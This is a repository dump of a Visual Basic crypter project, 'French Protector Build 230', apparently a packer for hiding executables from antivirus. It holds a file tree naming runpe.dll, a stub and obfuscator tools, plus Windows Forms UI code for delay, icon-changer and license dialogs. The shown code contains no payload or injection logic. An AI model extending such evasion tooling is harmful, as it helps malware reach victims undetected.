├── .vs └── French Protector Build 230 │ ├── FileContentIndex │ ├── 6564994a-cf96-431f-bcb8-445f0a8a6556.vsidx │ ├── b36a79b5-c48c-4507-a4fc-47856f5dd79f.vsidx │ └── read.lock │ ├── project-colors.json │ └── v17 │ └── .suo ├── French Protector Build 230.sln ├── French Protector Build 230.v11.suo ├── French Protector Build 230 ├── App.config ├── Delay.Designer.vb ├── Delay.resx ├── Delay.vb ├── Form1.Designer.vb ├── Form1.resx ├── Form1.vb ├── French Protector Build 230.vbproj ├── IconChanger.Designer.vb ├── IconChanger.resx ├── IconChanger.vb ├── License.Designer.vb ├── License.resx ├── License.vb ├── My Project │ ├── Application.Designer.vb │ ├── Application.myapp │ ├── AssemblyInfo.vb │ ├── Resources.Designer.vb │ ├── Resources.resx │ ├── Settings.Designer.vb │ └── Settings.settings ├── Resources │ └── Stub.txt ├── app.manifest ├── bin │ ├── Debug │ │ ├── French Protector Build 230.exe.config │ │ ├── French Protector Build 230.pdb │ │ ├── French Protector Build 230.vshost.exe │ │ ├── French Protector Build 230.vshost.exe.config │ │ ├── French Protector Build 230.vshost.exe.manifest │ │ ├── French Protector Build 230.xml │ │ ├── Guna.UI2.dll │ │ ├── Obfuscator │ │ │ ├── Obfuscator.exe │ │ │ └── dnlib.dll │ │ ├── assembly │ │ │ ├── FileCloner.exe │ │ │ ├── FileCloner.pdb │ │ │ ├── FileCloner.xml │ │ │ ├── Guna.UI2.dll │ │ │ └── res │ │ │ │ ├── Help │ │ │ │ ├── bm00.png │ │ │ │ ├── bm01.png │ │ │ │ ├── bm02.png │ │ │ │ ├── bm03.png │ │ │ │ ├── bm04.png │ │ │ │ ├── bm05.png │ │ │ │ ├── bm06.png │ │ │ │ ├── bm09.png │ │ │ │ ├── bm10.png │ │ │ │ ├── bm11.png │ │ │ │ ├── bm12.png │ │ │ │ ├── bm14.png │ │ │ │ ├── desktop.ini │ │ │ │ ├── help.html │ │ │ │ └── resource_hacker.png │ │ │ │ ├── ReadMe.txt │ │ │ │ ├── changes.txt │ │ │ │ ├── info.res │ │ │ │ ├── res.def │ │ │ │ ├── res.exe │ │ │ │ ├── res.ini │ │ │ │ └── res.log │ │ ├── res │ │ │ ├── Help │ │ │ │ ├── bm00.png │ │ │ │ ├── bm01.png │ │ │ │ ├── bm02.png │ │ │ │ ├── bm03.png │ │ │ │ ├── bm04.png │ │ │ │ ├── bm05.png │ │ │ │ ├── bm06.png │ │ │ │ ├── bm09.png │ │ │ │ ├── bm10.png │ │ │ │ ├── bm11.png │ │ │ │ ├── bm12.png │ │ │ │ ├── bm14.png │ │ │ │ ├── desktop.ini │ │ │ │ ├── help.html │ │ │ │ └── resource_hacker.png │ │ │ ├── ReadMe.txt │ │ │ ├── changes.txt │ │ │ ├── info.res │ │ │ ├── res.def │ │ │ ├── res.exe │ │ │ ├── res.ini │ │ │ └── res.log │ │ └── upx │ │ │ ├── BUGS │ │ │ ├── COPYING │ │ │ ├── LICENSE │ │ │ ├── NEWS │ │ │ ├── README │ │ │ ├── README.1ST │ │ │ ├── THANKS │ │ │ ├── upx.1 │ │ │ ├── upx.doc │ │ │ ├── upx.exe │ │ │ └── upx.html │ └── Release │ │ ├── French Protector Build 230.exe │ │ ├── French Protector Build 230.exe.config │ │ ├── French Protector Build 230.pdb │ │ ├── French Protector Build 230.vshost.exe │ │ ├── French Protector Build 230.vshost.exe.config │ │ ├── French Protector Build 230.vshost.exe.manifest │ │ ├── French Protector Build 230.xml │ │ ├── Guna.UI2.dll │ │ ├── Obfuscator │ │ ├── Obfuscator.exe │ │ └── dnlib.dll │ │ ├── qweqwe.exe │ │ ├── qweqwe.pdb │ │ ├── res │ │ ├── Help │ │ │ ├── bm00.png │ │ │ ├── bm01.png │ │ │ ├── bm02.png │ │ │ ├── bm03.png │ │ │ ├── bm04.png │ │ │ ├── bm05.png │ │ │ ├── bm06.png │ │ │ ├── bm09.png │ │ │ ├── bm10.png │ │ │ ├── bm11.png │ │ │ ├── bm12.png │ │ │ ├── bm14.png │ │ │ ├── desktop.ini │ │ │ ├── help.html │ │ │ └── resource_hacker.png │ │ ├── ReadMe.txt │ │ ├── changes.txt │ │ ├── info.res │ │ ├── res.def │ │ ├── res.exe │ │ ├── res.ini │ │ └── res.log │ │ └── upx │ │ ├── BUGS │ │ ├── COPYING │ │ ├── LICENSE │ │ ├── NEWS │ │ ├── README │ │ ├── README.1ST │ │ ├── THANKS │ │ ├── upx.1 │ │ ├── upx.doc │ │ ├── upx.exe │ │ └── upx.html ├── compress.Designer.vb ├── compress.resx ├── compress.vb ├── download.Designer.vb ├── download.resx ├── download.vb ├── obj │ ├── Debug │ │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.vb │ │ ├── DesignTimeResolveAssemblyReferences.cache │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ ├── French Protector Build 230.exe │ │ ├── French Protector Build 230.pdb │ │ ├── French Protector Build 230.vbproj.AssemblyReference.cache │ │ ├── French Protector Build 230.vbproj.CopyComplete │ │ ├── French Protector Build 230.vbproj.CoreCompileInputs.cache │ │ ├── French Protector Build 230.vbproj.FileListAbsolute.txt │ │ ├── French Protector Build 230.vbproj.GenerateResource.Cache │ │ ├── French Protector Build 230.xml │ │ ├── French_Protector_Build_230.Delay.resources │ │ ├── French_Protector_Build_230.Form1.resources │ │ ├── French_Protector_Build_230.IconChanger.resources │ │ ├── French_Protector_Build_230.License.resources │ │ ├── French_Protector_Build_230.Resources.resources │ │ ├── French_Protector_Build_230.compress.resources │ │ ├── French_Protector_Build_230.download.resources │ │ └── TempPE │ │ │ └── My Project.Resources.Designer.vb.dll │ └── Release │ │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.vb │ │ ├── .NETFramework,Version=v4.8.AssemblyAttributes.vb │ │ ├── DesignTimeResolveAssemblyReferences.cache │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ ├── French Protector Build 230.exe │ │ ├── French Protector Build 230.pdb │ │ ├── French Protector Build 230.vbproj.AssemblyReference.cache │ │ ├── French Protector Build 230.vbproj.CoreCompileInputs.cache │ │ ├── French Protector Build 230.vbproj.FileListAbsolute.txt │ │ ├── French Protector Build 230.vbproj.GenerateResource.cache │ │ ├── French Protector Build 230.vbproj.SuggestedBindingRedirects.cache │ │ ├── French Protector Build 230.vbprojResolveAssemblyReference.cache │ │ ├── French Protector Build 230.xml │ │ ├── French_Protector_Build_230.Delay.resources │ │ ├── French_Protector_Build_230.Form1.resources │ │ ├── French_Protector_Build_230.IconChanger.resources │ │ ├── French_Protector_Build_230.License.resources │ │ ├── French_Protector_Build_230.Resources.resources │ │ ├── French_Protector_Build_230.compress.resources │ │ ├── French_Protector_Build_230.download.resources │ │ └── TempPE │ │ └── My Project.Resources.Designer.vb.dll └── zarritem.vb ├── README.md └── runpe.dll /.vs/French Protector Build 230/FileContentIndex/6564994a-cf96-431f-bcb8-445f0a8a6556.vsidx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/.vs/French Protector Build 230/FileContentIndex/6564994a-cf96-431f-bcb8-445f0a8a6556.vsidx -------------------------------------------------------------------------------- /.vs/French Protector Build 230/FileContentIndex/b36a79b5-c48c-4507-a4fc-47856f5dd79f.vsidx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/.vs/French Protector Build 230/FileContentIndex/b36a79b5-c48c-4507-a4fc-47856f5dd79f.vsidx -------------------------------------------------------------------------------- /.vs/French Protector Build 230/FileContentIndex/read.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/.vs/French Protector Build 230/FileContentIndex/read.lock -------------------------------------------------------------------------------- /.vs/French Protector Build 230/project-colors.json: -------------------------------------------------------------------------------- 1 | { 2 | "Version": 1, 3 | "ProjectMap": { 4 | "a2fe74e1-b743-11d0-ae1a-00a0c90fffc3": { 5 | "ProjectGuid": "a2fe74e1-b743-11d0-ae1a-00a0c90fffc3", 6 | "DisplayName": "Diğer Dosyalar", 7 | "ColorIndex": -1 8 | } 9 | }, 10 | "NextColorIndex": 0 11 | } -------------------------------------------------------------------------------- /.vs/French Protector Build 230/v17/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/.vs/French Protector Build 230/v17/.suo -------------------------------------------------------------------------------- /French Protector Build 230.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.0.31521.260 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "French Protector Build 230", "French Protector Build 230\French Protector Build 230.vbproj", "{4BBA3EF6-FA5D-42F8-B1E2-40471E83A388}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {4BBA3EF6-FA5D-42F8-B1E2-40471E83A388}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {4BBA3EF6-FA5D-42F8-B1E2-40471E83A388}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {4BBA3EF6-FA5D-42F8-B1E2-40471E83A388}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {4BBA3EF6-FA5D-42F8-B1E2-40471E83A388}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {59411E21-A456-48E7-9F8F-40DB70F42BE6} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /French Protector Build 230.v11.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230.v11.suo -------------------------------------------------------------------------------- /French Protector Build 230/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /French Protector Build 230/Delay.Designer.vb: -------------------------------------------------------------------------------- 1 |  _ 2 | Partial Class Delay 3 | Inherits System.Windows.Forms.Form 4 | 5 | 'Form overrides dispose to clean up the component list. 6 | _ 7 | Protected Overrides Sub Dispose(ByVal disposing As Boolean) 8 | Try 9 | If disposing AndAlso components IsNot Nothing Then 10 | components.Dispose() 11 | End If 12 | Finally 13 | MyBase.Dispose(disposing) 14 | End Try 15 | End Sub 16 | 17 | 'Required by the Windows Form Designer 18 | Private components As System.ComponentModel.IContainer 19 | 20 | 'NOTE: The following procedure is required by the Windows Form Designer 21 | 'It can be modified using the Windows Form Designer. 22 | 'Do not modify it using the code editor. 23 | _ 24 | Private Sub InitializeComponent() 25 | Me.components = New System.ComponentModel.Container() 26 | Me.Panel1 = New System.Windows.Forms.Panel() 27 | Me.Label3 = New System.Windows.Forms.Label() 28 | Me.Label2 = New System.Windows.Forms.Label() 29 | Me.RichTextBox3 = New System.Windows.Forms.RichTextBox() 30 | Me.Panel2 = New System.Windows.Forms.Panel() 31 | Me.Guna2GradientButton1 = New Guna.UI2.WinForms.Guna2GradientButton() 32 | Me.PictureBox1 = New System.Windows.Forms.PictureBox() 33 | Me.Guna2GradientButton2 = New Guna.UI2.WinForms.Guna2GradientButton() 34 | Me.Label1 = New System.Windows.Forms.Label() 35 | Me.Guna2DragControl1 = New Guna.UI2.WinForms.Guna2DragControl(Me.components) 36 | Me.Guna2DragControl2 = New Guna.UI2.WinForms.Guna2DragControl(Me.components) 37 | Me.Guna2DragControl3 = New Guna.UI2.WinForms.Guna2DragControl(Me.components) 38 | Me.Panel1.SuspendLayout() 39 | Me.Panel2.SuspendLayout() 40 | CType(Me.PictureBox1, System.ComponentModel.ISupportInitialize).BeginInit() 41 | Me.SuspendLayout() 42 | ' 43 | 'Panel1 44 | ' 45 | Me.Panel1.BackColor = System.Drawing.Color.FromArgb(CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer)) 46 | Me.Panel1.Controls.Add(Me.Label3) 47 | Me.Panel1.Controls.Add(Me.Label2) 48 | Me.Panel1.Controls.Add(Me.RichTextBox3) 49 | Me.Panel1.Controls.Add(Me.Panel2) 50 | Me.Panel1.Location = New System.Drawing.Point(0, 0) 51 | Me.Panel1.Name = "Panel1" 52 | Me.Panel1.Size = New System.Drawing.Size(319, 261) 53 | Me.Panel1.TabIndex = 0 54 | ' 55 | 'Label3 56 | ' 57 | Me.Label3.AutoSize = True 58 | Me.Label3.BackColor = System.Drawing.Color.FromArgb(CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer)) 59 | Me.Label3.ForeColor = System.Drawing.Color.White 60 | Me.Label3.Location = New System.Drawing.Point(22, 187) 61 | Me.Label3.Name = "Label3" 62 | Me.Label3.Size = New System.Drawing.Size(110, 26) 63 | Me.Label3.TabIndex = 7 64 | Me.Label3.Text = "28000 => 28 seconds" & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "1000 => 1 second" & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) 65 | ' 66 | 'Label2 67 | ' 68 | Me.Label2.AutoSize = True 69 | Me.Label2.BackColor = System.Drawing.Color.FromArgb(CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer)) 70 | Me.Label2.ForeColor = System.Drawing.Color.White 71 | Me.Label2.Location = New System.Drawing.Point(22, 127) 72 | Me.Label2.Name = "Label2" 73 | Me.Label2.Size = New System.Drawing.Size(40, 13) 74 | Me.Label2.TabIndex = 6 75 | Me.Label2.Text = "Delay :" 76 | ' 77 | 'RichTextBox3 78 | ' 79 | Me.RichTextBox3.BackColor = System.Drawing.Color.FromArgb(CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer)) 80 | Me.RichTextBox3.BorderStyle = System.Windows.Forms.BorderStyle.None 81 | Me.RichTextBox3.ForeColor = System.Drawing.Color.IndianRed 82 | Me.RichTextBox3.Location = New System.Drawing.Point(24, 154) 83 | Me.RichTextBox3.Name = "RichTextBox3" 84 | Me.RichTextBox3.Size = New System.Drawing.Size(268, 19) 85 | Me.RichTextBox3.TabIndex = 5 86 | Me.RichTextBox3.Text = "28000" 87 | ' 88 | 'Panel2 89 | ' 90 | Me.Panel2.BackColor = System.Drawing.Color.FromArgb(CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer)) 91 | Me.Panel2.Controls.Add(Me.Guna2GradientButton1) 92 | Me.Panel2.Controls.Add(Me.PictureBox1) 93 | Me.Panel2.Controls.Add(Me.Guna2GradientButton2) 94 | Me.Panel2.Controls.Add(Me.Label1) 95 | Me.Panel2.Location = New System.Drawing.Point(-9, 0) 96 | Me.Panel2.Name = "Panel2" 97 | Me.Panel2.Size = New System.Drawing.Size(328, 56) 98 | Me.Panel2.TabIndex = 1 99 | ' 100 | 'Guna2GradientButton1 101 | ' 102 | Me.Guna2GradientButton1.Animated = True 103 | Me.Guna2GradientButton1.BackColor = System.Drawing.Color.Transparent 104 | Me.Guna2GradientButton1.BorderStyle = System.Drawing.Drawing2D.DashStyle.Dot 105 | Me.Guna2GradientButton1.CheckedState.Parent = Me.Guna2GradientButton1 106 | Me.Guna2GradientButton1.CustomImages.Parent = Me.Guna2GradientButton1 107 | Me.Guna2GradientButton1.FillColor = System.Drawing.Color.IndianRed 108 | Me.Guna2GradientButton1.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer)) 109 | Me.Guna2GradientButton1.Font = New System.Drawing.Font("Segoe UI", 9.0!) 110 | Me.Guna2GradientButton1.ForeColor = System.Drawing.Color.White 111 | Me.Guna2GradientButton1.HoverState.Parent = Me.Guna2GradientButton1 112 | Me.Guna2GradientButton1.IndicateFocus = True 113 | Me.Guna2GradientButton1.Location = New System.Drawing.Point(273, 14) 114 | Me.Guna2GradientButton1.Name = "Guna2GradientButton1" 115 | Me.Guna2GradientButton1.ShadowDecoration.Parent = Me.Guna2GradientButton1 116 | Me.Guna2GradientButton1.Size = New System.Drawing.Size(43, 25) 117 | Me.Guna2GradientButton1.TabIndex = 9 118 | Me.Guna2GradientButton1.Text = "X" 119 | Me.Guna2GradientButton1.UseTransparentBackground = True 120 | ' 121 | 'PictureBox1 122 | ' 123 | Me.PictureBox1.Location = New System.Drawing.Point(17, 11) 124 | Me.PictureBox1.Name = "PictureBox1" 125 | Me.PictureBox1.Size = New System.Drawing.Size(31, 30) 126 | Me.PictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.StretchImage 127 | Me.PictureBox1.TabIndex = 10 128 | Me.PictureBox1.TabStop = False 129 | ' 130 | 'Guna2GradientButton2 131 | ' 132 | Me.Guna2GradientButton2.Animated = True 133 | Me.Guna2GradientButton2.BackColor = System.Drawing.Color.Transparent 134 | Me.Guna2GradientButton2.BorderStyle = System.Drawing.Drawing2D.DashStyle.Dot 135 | Me.Guna2GradientButton2.CheckedState.Parent = Me.Guna2GradientButton2 136 | Me.Guna2GradientButton2.CustomImages.Parent = Me.Guna2GradientButton2 137 | Me.Guna2GradientButton2.FillColor = System.Drawing.Color.IndianRed 138 | Me.Guna2GradientButton2.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer)) 139 | Me.Guna2GradientButton2.Font = New System.Drawing.Font("Segoe UI", 9.0!) 140 | Me.Guna2GradientButton2.ForeColor = System.Drawing.Color.White 141 | Me.Guna2GradientButton2.HoverState.Parent = Me.Guna2GradientButton2 142 | Me.Guna2GradientButton2.IndicateFocus = True 143 | Me.Guna2GradientButton2.Location = New System.Drawing.Point(599, 21) 144 | Me.Guna2GradientButton2.Name = "Guna2GradientButton2" 145 | Me.Guna2GradientButton2.ShadowDecoration.Parent = Me.Guna2GradientButton2 146 | Me.Guna2GradientButton2.Size = New System.Drawing.Size(43, 25) 147 | Me.Guna2GradientButton2.TabIndex = 2 148 | Me.Guna2GradientButton2.Text = "X" 149 | Me.Guna2GradientButton2.UseTransparentBackground = True 150 | ' 151 | 'Label1 152 | ' 153 | Me.Label1.AutoSize = True 154 | Me.Label1.Font = New System.Drawing.Font("Microsoft Sans Serif", 11.25!, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, CType(0, Byte)) 155 | Me.Label1.ForeColor = System.Drawing.Color.White 156 | Me.Label1.ImageAlign = System.Drawing.ContentAlignment.BottomLeft 157 | Me.Label1.Location = New System.Drawing.Point(54, 17) 158 | Me.Label1.Name = "Label1" 159 | Me.Label1.Size = New System.Drawing.Size(45, 18) 160 | Me.Label1.TabIndex = 0 161 | Me.Label1.Text = "Delay" 162 | ' 163 | 'Guna2DragControl1 164 | ' 165 | Me.Guna2DragControl1.TargetControl = Me.Panel1 166 | ' 167 | 'Guna2DragControl2 168 | ' 169 | Me.Guna2DragControl2.TargetControl = Me.Panel2 170 | ' 171 | 'Guna2DragControl3 172 | ' 173 | Me.Guna2DragControl3.TargetControl = Me 174 | ' 175 | 'Delay 176 | ' 177 | Me.AutoScaleDimensions = New System.Drawing.SizeF(6.0!, 13.0!) 178 | Me.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font 179 | Me.ClientSize = New System.Drawing.Size(319, 252) 180 | Me.Controls.Add(Me.Panel1) 181 | Me.FormBorderStyle = System.Windows.Forms.FormBorderStyle.None 182 | Me.Name = "Delay" 183 | Me.ShowIcon = False 184 | Me.ShowInTaskbar = False 185 | Me.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen 186 | Me.Text = "Delay" 187 | Me.Panel1.ResumeLayout(False) 188 | Me.Panel1.PerformLayout() 189 | Me.Panel2.ResumeLayout(False) 190 | Me.Panel2.PerformLayout() 191 | CType(Me.PictureBox1, System.ComponentModel.ISupportInitialize).EndInit() 192 | Me.ResumeLayout(False) 193 | 194 | End Sub 195 | 196 | Friend WithEvents Panel1 As Panel 197 | Friend WithEvents Panel2 As Panel 198 | Friend WithEvents PictureBox1 As PictureBox 199 | Friend WithEvents Guna2GradientButton2 As Guna.UI2.WinForms.Guna2GradientButton 200 | Friend WithEvents Label1 As Label 201 | Friend WithEvents RichTextBox3 As RichTextBox 202 | Friend WithEvents Label2 As Label 203 | Friend WithEvents Label3 As Label 204 | Friend WithEvents Guna2DragControl1 As Guna.UI2.WinForms.Guna2DragControl 205 | Friend WithEvents Guna2DragControl2 As Guna.UI2.WinForms.Guna2DragControl 206 | Friend WithEvents Guna2DragControl3 As Guna.UI2.WinForms.Guna2DragControl 207 | Friend WithEvents Guna2GradientButton1 As Guna.UI2.WinForms.Guna2GradientButton 208 | End Class 209 | -------------------------------------------------------------------------------- /French Protector Build 230/Delay.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 17, 17 122 | 123 | 124 | 178, 17 125 | 126 | 127 | 339, 17 128 | 129 | -------------------------------------------------------------------------------- /French Protector Build 230/Delay.vb: -------------------------------------------------------------------------------- 1 | Public Class Delay 2 | Private Sub Guna2GradientButton1_Click(sender As Object, e As EventArgs) Handles Guna2GradientButton1.Click 3 | Me.Hide() 4 | End Sub 5 | End Class -------------------------------------------------------------------------------- /French Protector Build 230/Form1.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 17, 17 122 | 123 | 124 | 106, 17 125 | 126 | 127 | 267, 17 128 | 129 | 130 | 428, 17 131 | 132 | -------------------------------------------------------------------------------- /French Protector Build 230/French Protector Build 230.vbproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {4BBA3EF6-FA5D-42F8-B1E2-40471E83A388} 8 | WinExe 9 | French_Protector_Build_230.My.MyApplication 10 | French_Protector_Build_230 11 | French Protector Build 230 12 | 512 13 | WindowsForms 14 | v4.8 15 | true 16 | true 17 | 18 | 19 | 20 | AnyCPU 21 | true 22 | full 23 | true 24 | true 25 | bin\Debug\ 26 | French Protector Build 230.xml 27 | 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 28 | 29 | 30 | AnyCPU 31 | pdbonly 32 | false 33 | true 34 | true 35 | bin\Release\ 36 | French Protector Build 230.xml 37 | 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 38 | 39 | 40 | On 41 | 42 | 43 | Binary 44 | 45 | 46 | Off 47 | 48 | 49 | On 50 | 51 | 52 | app.manifest 53 | 54 | 55 | 56 | 57 | 58 | 59 | D:\Guna_UI_Framework_Ultimate_2.0.0.1_Downloadly.ir\Guna_UI_v2.0.0.6\Guna.UI2.WinForms_v2.0.0.6\.net 2.0\Guna.UI2.dll 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | compress.vb 90 | 91 | 92 | Form 93 | 94 | 95 | Delay.vb 96 | 97 | 98 | Form 99 | 100 | 101 | download.vb 102 | 103 | 104 | Form 105 | 106 | 107 | Form 108 | 109 | 110 | Form1.vb 111 | Form 112 | 113 | 114 | IconChanger.vb 115 | 116 | 117 | Form 118 | 119 | 120 | License.vb 121 | 122 | 123 | Form 124 | 125 | 126 | 127 | True 128 | Application.myapp 129 | True 130 | 131 | 132 | True 133 | True 134 | Resources.resx 135 | 136 | 137 | True 138 | Settings.settings 139 | True 140 | 141 | 142 | 143 | 144 | 145 | compress.vb 146 | 147 | 148 | Delay.vb 149 | 150 | 151 | download.vb 152 | 153 | 154 | Form1.vb 155 | 156 | 157 | IconChanger.vb 158 | 159 | 160 | License.vb 161 | 162 | 163 | VbMyResourcesResXFileCodeGenerator 164 | My.Resources 165 | Designer 166 | Resources.Designer.vb 167 | 168 | 169 | 170 | 171 | 172 | MyApplicationCodeGenerator 173 | Application.Designer.vb 174 | 175 | 176 | SettingsSingleFileGenerator 177 | My 178 | Settings.Designer.vb 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | -------------------------------------------------------------------------------- /French Protector Build 230/IconChanger.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 17, 17 122 | 123 | 124 | 132, 17 125 | 126 | 127 | 293, 17 128 | 129 | -------------------------------------------------------------------------------- /French Protector Build 230/IconChanger.vb: -------------------------------------------------------------------------------- 1 | Public Class IconChanger 2 | 3 | Private Sub Guna2GradientButton1_Click(sender As Object, e As EventArgs) Handles Guna2GradientButton1.Click 4 | Dim Open As New OpenFileDialog 5 | Open.Filter = "Icon Files (*.ico)|*.ico" 6 | If Open.ShowDialog = vbOK Then 7 | Guna2TextBox1.Text = Open.FileName 8 | PictureBox2.Image = Drawing.Icon.ExtractAssociatedIcon(Guna2TextBox1.Text).ToBitmap 9 | End If 10 | End Sub 11 | 12 | Private Sub Guna2GradientButton2_Click(sender As Object, e As EventArgs) Handles Guna2GradientButton2.Click 13 | Me.Hide() 14 | End Sub 15 | End Class -------------------------------------------------------------------------------- /French Protector Build 230/License.Designer.vb: -------------------------------------------------------------------------------- 1 |  _ 2 | Partial Class License 3 | Inherits System.Windows.Forms.Form 4 | 5 | 'Form overrides dispose to clean up the component list. 6 | _ 7 | Protected Overrides Sub Dispose(ByVal disposing As Boolean) 8 | Try 9 | If disposing AndAlso components IsNot Nothing Then 10 | components.Dispose() 11 | End If 12 | Finally 13 | MyBase.Dispose(disposing) 14 | End Try 15 | End Sub 16 | 17 | 'Required by the Windows Form Designer 18 | Private components As System.ComponentModel.IContainer 19 | 20 | 'NOTE: The following procedure is required by the Windows Form Designer 21 | 'It can be modified using the Windows Form Designer. 22 | 'Do not modify it using the code editor. 23 | _ 24 | Private Sub InitializeComponent() 25 | Me.components = New System.ComponentModel.Container() 26 | Me.Panel1 = New System.Windows.Forms.Panel() 27 | Me.RichTextBox3 = New System.Windows.Forms.RichTextBox() 28 | Me.Guna2GradientButton1 = New Guna.UI2.WinForms.Guna2GradientButton() 29 | Me.Panel2 = New System.Windows.Forms.Panel() 30 | Me.PictureBox1 = New System.Windows.Forms.PictureBox() 31 | Me.Guna2GradientButton2 = New Guna.UI2.WinForms.Guna2GradientButton() 32 | Me.Label1 = New System.Windows.Forms.Label() 33 | Me.Guna2DragControl1 = New Guna.UI2.WinForms.Guna2DragControl(Me.components) 34 | Me.Guna2DragControl2 = New Guna.UI2.WinForms.Guna2DragControl(Me.components) 35 | Me.Guna2DragControl3 = New Guna.UI2.WinForms.Guna2DragControl(Me.components) 36 | Me.Panel1.SuspendLayout() 37 | Me.Panel2.SuspendLayout() 38 | CType(Me.PictureBox1, 